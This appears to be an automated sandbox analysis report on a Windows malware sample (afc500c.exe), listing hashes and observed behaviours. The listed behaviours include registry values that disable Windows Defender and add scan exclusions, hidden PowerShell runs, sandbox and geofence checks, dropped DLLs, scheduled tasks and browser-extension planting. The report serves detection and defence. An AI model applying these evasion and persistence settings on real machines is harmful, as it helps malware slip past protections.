Overview
overview
10Static
static
3221b9.exe
windows7-x64
10221b9.exe
windows10-2004-x64
102c42a36d7.exe
windows7-x64
102c42a36d7.exe
windows10-2004-x64
102da5f7422573.exe
windows7-x64
32da5f7422573.exe
windows10-2004-x64
33fcc16.exe
windows7-x64
33fcc16.exe
windows10-2004-x64
34772.exe
windows7-x64
104772.exe
windows10-2004-x64
106c1a.exe
windows7-x64
106c1a.exe
windows10-2004-x64
1079330.exe
windows7-x64
1079330.exe
windows10-2004-x64
10afc500c.exe
windows7-x64
10afc500c.exe
windows10-2004-x64
8ef62b5a6474.exe
windows7-x64
10ef62b5a6474.exe
windows10-2004-x64
10Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12/03/2025, 18:50
Static task
static1
Behavioral task
behavioral1
Sample
221b9.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
221b9.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
2c42a36d7.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
2c42a36d7.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
2da5f7422573.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
2da5f7422573.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
3fcc16.exe
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
3fcc16.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral9
Sample
4772.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
4772.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral11
Sample
6c1a.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
6c1a.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral13
Sample
79330.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
79330.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral15
Sample
afc500c.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
afc500c.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral17
Sample
ef62b5a6474.exe
Resource
win7-20250207-en
Behavioral task
behavioral18
Sample
ef62b5a6474.exe
Resource
win10v2004-20250217-en
General
-
Target
afc500c.exe
-
Size
7.3MB
-
MD5
63926a5ec17e0838207346060ea15fec
-
SHA1
d30179fb24c18f9d49202f5110d38ed7967fa836
-
SHA256
67c3aedc80696d9f2bf64ec4a4c7c461605d54f169f83babdc8b90993afc500c
-
SHA512
f0827e23038ad4fc22a0d88c2a8f466638cbb6447538f88bc8eef61b9ca585ecde215cc9c5287fc560cfc7adcb470aa312395dcad9f78e036a4769dd29ea6e48
-
SSDEEP
196608:91O6DEFZUlN3lPS0XJjoF0Kx0iroV8H6RrzJFAkN:3OAEFZmVqBFV0iroOH6RrHAkN
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Windows security bypass 2 TTPs 40 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TUiypwAeSPRUPoVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dwSOvWKysCpEXQRJ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dIcdGsFSuyUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dIcdGsFSuyUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dwSOvWKysCpEXQRJ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ardKySDqUVkhC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xQNizQXsNpkyKPuIghR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LfKWeIlHqQBU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ardKySDqUVkhC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xQNizQXsNpkyKPuIghR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dwSOvWKysCpEXQRJ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LfKWeIlHqQBU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TUiypwAeSPRUPoVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dwSOvWKysCpEXQRJ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CbVqBnigU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CbVqBnigU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 25 2708 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 3020 powershell.EXE 1608 powershell.EXE 1304 powershell.EXE 2312 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation JWGWblk.exe -
Executes dropped EXE 4 IoCs
pid Process 2700 Install.exe 2956 Install.exe 1940 GuxHFDR.exe 1012 JWGWblk.exe -
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 2556 forfiles.exe 2720 forfiles.exe -
Loads dropped DLL 12 IoCs
pid Process 2188 afc500c.exe 2700 Install.exe 2700 Install.exe 2700 Install.exe 2700 Install.exe 2956 Install.exe 2956 Install.exe 2956 Install.exe 2708 rundll32.exe 2708 rundll32.exe 2708 rundll32.exe 2708 rundll32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json JWGWblk.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat JWGWblk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JWGWblk.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol JWGWblk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_C96AFB7E7DD57AEA9355932BA060F2C5 JWGWblk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini GuxHFDR.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 JWGWblk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 JWGWblk.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol GuxHFDR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol GuxHFDR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JWGWblk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_77C83920FD5B18C343ABF7737DA1F9EE JWGWblk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_77C83920FD5B18C343ABF7737DA1F9EE JWGWblk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_C96AFB7E7DD57AEA9355932BA060F2C5 JWGWblk.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\ardKySDqUVkhC\GEPGIym.xml JWGWblk.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi JWGWblk.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak JWGWblk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja JWGWblk.exe File created C:\Program Files (x86)\CbVqBnigU\oNDKTkE.xml JWGWblk.exe File created C:\Program Files (x86)\LfKWeIlHqQBU2\fgYidOq.xml JWGWblk.exe File created C:\Program Files (x86)\xQNizQXsNpkyKPuIghR\TBplnPE.dll JWGWblk.exe File created C:\Program Files (x86)\dIcdGsFSuyUn\xBbybVG.dll JWGWblk.exe File created C:\Program Files (x86)\CbVqBnigU\UXaudO.dll JWGWblk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi JWGWblk.exe File created C:\Program Files (x86)\LfKWeIlHqQBU2\hUUXwayuUdFOq.dll JWGWblk.exe File created C:\Program Files (x86)\xQNizQXsNpkyKPuIghR\VZjJGmy.xml JWGWblk.exe File created C:\Program Files (x86)\ardKySDqUVkhC\awsQOUL.dll JWGWblk.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bIqjSKjLtvGhSJBNfA.job schtasks.exe File created C:\Windows\Tasks\nWibDlWEYQvBMTcbY.job schtasks.exe File created C:\Windows\Tasks\bztBruNizUuNfHs.job schtasks.exe File created C:\Windows\Tasks\AYwEeuzLnMnSOnskF.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language afc500c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GuxHFDR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JWGWblk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-6f-95-f3-cd-55 JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{97EB7239-D914-4682-A759-785A2819D5A6}\ea-6f-95-f3-cd-55 JWGWblk.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-6f-95-f3-cd-55\WpadDecisionTime = a022c3f77f93db01 JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed JWGWblk.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00b6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates JWGWblk.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs JWGWblk.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 JWGWblk.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" JWGWblk.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{97EB7239-D914-4682-A759-785A2819D5A6}\WpadNetworkName = "Network 3" JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs JWGWblk.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{97EB7239-D914-4682-A759-785A2819D5A6}\WpadDecisionReason = "1" JWGWblk.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-6f-95-f3-cd-55\WpadDecision = "0" JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust JWGWblk.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-6f-95-f3-cd-55\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{97EB7239-D914-4682-A759-785A2819D5A6}\WpadDecisionTime = a022c3f77f93db01 JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates JWGWblk.exe Key created 